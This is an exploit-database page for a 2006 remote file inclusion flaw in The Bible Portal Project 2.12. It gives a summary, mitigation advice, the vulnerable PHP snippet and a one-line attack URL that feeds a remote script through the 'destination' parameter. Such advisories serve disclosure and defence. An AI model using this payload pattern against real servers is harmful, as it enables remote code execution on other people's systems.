header-logo
Suggest Exploit
vendor:
The Bible Portal Project (destination)
by:
Kacper (a.k.a Rahim)
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: The Bible Portal Project (destination)
Affected Version From: 2.12
Affected Version To: 2.12
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

The Bible Portal Project (destination) <= 2.12 Remote File Include Vulnerability

The Bible Portal Project (destination) version 2.12 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of The Bible Portal Project (destination) and ensure that all user input is properly sanitized and validated.
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  The Bible Portal Project (destination) <= 2.12 Remote File Include Vulnerability
$$  script site: http://www.bibleportalproject.com/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

#rtf_parser.php:
/*
$read = preg_replace("/~ulnone/", "", $read);
$read = preg_replace("/~line/", "

\n", $read);
$read = trim($read);

fwrite($file, "$read\n");
fclose($file);


include"WeBelieveAEForm.inc";

echo"$add_form";
include"$destination.txt";
echo"
$add_form1
$html_guide
";
unlink("$destination.txt");
*/
#Expl:


http://www.site.com/[tbpp_path]/Admin/rtf_parser.php?destination=[evil_scripts]


#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-06-14]

Navigation

Suggest Exploit

Services By CQR